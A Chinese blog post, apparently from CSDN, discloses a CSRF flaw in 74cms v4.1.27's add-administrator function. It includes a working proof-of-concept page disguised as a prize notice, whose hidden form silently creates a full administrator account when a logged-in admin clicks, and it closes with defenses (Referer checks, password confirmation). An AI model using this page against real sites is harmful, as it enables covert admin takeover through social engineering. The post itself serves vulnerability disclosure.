74cms CSRF漏洞可以诱骗添加管理员

最新推荐文章于 2024-05-21 08:50:02 发布
最新推荐文章于 2024-05-21 08:50:02 发布
阅读量2.3k 收藏 3
点赞数 1
分类专栏: php 文章标签: 74cms cms 漏洞 csrf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lfzhumengzhe/article/details/62887449
版权

注:本文章只是简单的发现了74cms[骑士cms] v4.1.27添加管理员时产生的CSRF漏洞


1.正常情况下,管理员会登录后,进入到【系统】-【网络管理员】-【添加管理员】中,进行添加管理员。



填写好相关数据后,管理员正常进行添加。然后我们看看抓取到的数据


然后我尝试伪造一个假页面,内容如下:

<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>恭喜你中奖啦</title>
</head>
  <body>
	<img src="img/bonus.jpg"/>
	    <form action="http://www.a.com/cms/index.php?m=admin&c=admin&a=add" method="POST" id="transfer" name="transfer">
        <input type="hidden" name="username" value="test_hi">
        <input type="hidden" name="email" value="test@test.com">
        <input type="hidden" name="password" value="admin">
        <input type="hidden" name="repassword" value="admin">
        <input type="hidden" name="role_id" value="1">
        <input type="hidden" name="submit3" value="添加">
		<button type="submit" value="Submit">进入领取</button>
      </form>
  </body>
</html>
显示效果如下图:


然后我们诱骗真实的管理员在登录后,去访问这个页面。

当管理员点击进入领取时,直接就执行了操作,因此实现了一个简单的CSRF的攻击。


然后我们可以看到在管理员那一栏目,新增了一个“test_hi”的管理员,密码由伪造者设置[演示中是admin],如果真正的管理员没有及时发现,那么此账号“test_hi”就可以利用。


尝试登录后,就可以看到,登录成功。


我所想到的防御:

1.在添加管理时检测相关参数和页面来源[Referer]

2.由于管理员权限较高,因此在添加时建议强制要求管理员输入自己的密码进行确认。


本文只是讲解了74CMS的一个小问题,文章写得不足不到之处,欢迎大家批评指正。

0xzmz
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
74CMS3.0 宽字节注入后台+任意文件写入获取shell复现
信安小菜鸡的博客
04-30 1058
复现宽字节注入后台 进入后台 任意输入密码,填写正确验证码,开启burp抓包 把拦截的包发送给重发器,修改admin_name如图所示,再点击发送 成功进入后台 复现任意文件写入 如图所示构造post文件名和内容创建模板写入 然后再访问写入路径即可 原理分析 admin_login.php <?php /* * 74cms 锟斤拷录页锟斤拷 * ======================================================================
74CMS 3.0 SQL注入漏洞后台.docx
07-07
74CMS 3.0 SQL注入漏洞后台演示,利用 sqlmap与burpsuit注入,需具备php基础
74CMS 3.0 CSRF漏洞
浅笑996的博客
12-27 1084
一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK 3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定 漏洞分析 1.点击展开左侧admin目录,在弹出的下拉列表中双...
什么是CSRFCSRF漏洞原理攻击与防御(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
05-21 2778
这时该转帐请求的 Referer 值就会是转账按钮所在的页面的URL,而如果黑客要对银行网站实施 CSRF攻击,他只能在他自己的网站构造请求,当用户User通过黑客的网站发送请求到WebA时,该请求的 Referer 是指向黑客自己的网站。你可以这么来理解:攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。比如在PHP中,如果使用的是。
CSRF原理到CMS漏洞利用
未完成的歌~的博客
02-02 1218
文章目录0x01 基础知识:1、CSRF漏洞简介:2、与XSS的区别:3、攻击的细节:4、常见的攻击类型:4.1、GET类型的CSRF:4.2、POST类型的CSRF:0x02 CSRF漏洞检测:1、手动测试:2、使用CSRF检测工具:2.1、CSRFTester:2.2、BurpSuite:0x03 CSRF漏洞利用实例:1、MetInfo CMS:2、骑士CMS:0x04 如何防御CSRF攻击:1、验证HTTP Referer字段:2、添加Token,并验证:3、关键请求添加验证码:最后: 0x01 基
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
74CMS 3.0 SQL注入漏洞前台
浅笑996的博客
12-09 1671
一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK 3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定 漏洞分析 1.点击展开左侧user目录,弹出的下拉列表中双击u...
espcms csrf漏洞 导致任意管理员添加1
08-03
由于在管理员添加页面缺少了必要的CSRF防护令牌,攻击者可以构造恶意的HTML页面,诱导用户点击,从而执行添加管理员的操作。 **二、漏洞成因** CSRF漏洞通常发生在Web应用中,当一个受信任的用户在未完全退出登录...
CSRF漏洞的靶场实验
09-19
74cms是一个常见的Web应用程序平台,可能存在的CSRF漏洞是攻击者可以构造特定的请求,诱使用户执行如修改个人资料、发布文章等敏感操作。在提供的文档"74cms-csrf漏洞.docx"中,可能包含了关于这个靶场的具体步骤和...
hucart-含有CSRF漏洞的源码.zip
12-31
通过分析和修复hucart的CSRF漏洞,开发者可以深入理解CSRF攻击的机制,提升Web应用的安全性。同时,也可以了解如何在实际项目中运用上述防范策略,以保护用户的数据安全。 总之,理解和掌握CSRF漏洞对于任何Web...
CSRFTester:一款CSRF漏洞的安全测试工具
02-26
CSRFTester:一款CSRF漏洞的安全测试工具CSRFTester是一款CSRF漏洞的...一个简单的CSRF漏洞利用示例就是网站管理员在点击了某个外部连接的时候,在不知情的情况下在自己的网站中增加了一个不法者设置的账户。CSRFTest
CSRF漏洞详细说明
02-26
经常入选owasp漏洞列表Top10,在当前web漏洞排行中,与XSS和SQL注入并列前三。与前两者相比,CSRF相对来说受到的关注要小很多,但是危害却非常大。通常情况下,有三种方法被广泛用来防御CSRF攻击:验证token,验证...
74cms3.0安装以及cmsSQL注入漏洞详解
Gjqhs的博客
03-08 1497
下载解压到www目录并开启低版本PHP服务 http://127.0.0.1/74cms3.0/install/index.php Error:Can‘t select MySQL database(74cms3.0)!问题解决 无脑确定 按照提示配置,不知道填啥就写root,邮箱随便写一个@qq.com 后台 前台 注册 ...
csrf(跨站请求伪造)
FODKING的博客
10-16 2268
跨站请求伪造 通过伪造信任 CSRF漏洞原理 利用目标用户的合法身份,以目标用户的名义执行某些非法操作 常见验证的策略 Referer :验证ip等 Token :生成随机值加入到cookie里 验证码 万能密码(密码绕过) 11%df’ or 1=1%23 理论上没加防过滤的都可绕过登录 csrf实验 材料:74cms 攻击方写一个payload伪造url 服务方点击后发现管理员多了 ...
74CMS 3.0 存储型XSS漏洞
浅笑996的博客
01-09 902
一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK 3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定 漏洞分析 1.点击展开左侧link目录,弹出的下拉列表中双击a...
Web安全—CSRF漏洞利用(pikachu)
weixin_44431280的博客
04-06 6706
Web安全—CSRF漏洞利用 前言:此篇文章主要记录pikachu靶场漏洞中三种模式的CSRF漏洞的利用,此处不对基本原理进行过多赘述,基础可参考文章:Web安全—跨站请求伪造攻击(CSRF漏洞利用场景:攻击者伪造一个正常的请求(通常是一个链接),诱导用户点击,从而在受害者不知情的情况下以受害者的身份去修改用户已经登陆的网站信息。 一:CSRF(GET)用户通过表单提交的数据显示在URL中 1,用户使用账户登录网站,本地生成cookie等身份认证信息 2,黑客登陆网站,抓取网站修改功能的数据包参数
(29.1)【CSRF详解】CSRF原理、利用过程、分类、举例、工具……
04-06 9814
一个细节都不不想放过
「网络安全渗透」如果你还不懂CSRF?这一篇让你彻底掌握
2301_76694151的博客
05-12 320
小明由于刚刚就登陆了Gmail,所以这个请求发送时,携带着小明的登录凭证(Cookie),Gmail的后台接收到请求,验证了确实有小明的登录凭证,于是成功给小明配置了过滤器。小明由于刚刚就登陆了Gmail,所以这个请求发送时,携带着小明的登录凭证(Cookie),Gmail的后台接收到请求,验证了确实有小明的登录凭证,于是成功给小明配置了过滤器。果然,这只是一个什么都没有的空白页面,小明失望的关闭了页面。小明仔细查了下域名的转让,对方是拥有自己的验证码的,而域名的验证码只存在于自己的邮箱里面。
CSRF漏洞的概念、利用方式、防御方案
好好睡觉
03-19 3542
CSRF漏洞的概念,利用方式、防御方案
74CMS v5.0.1 后台 CSRF 漏洞分析与复现
74CMS v5.0.1中,攻击者可以构建一个包含特定URL和POST参数的恶意网页,这个URL指向了后台的管理员添加接口(/index.php?m=admin&c=admin&a=add)。当受害者(即系统管理员)在登录状态下去访问这个恶意网页时,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值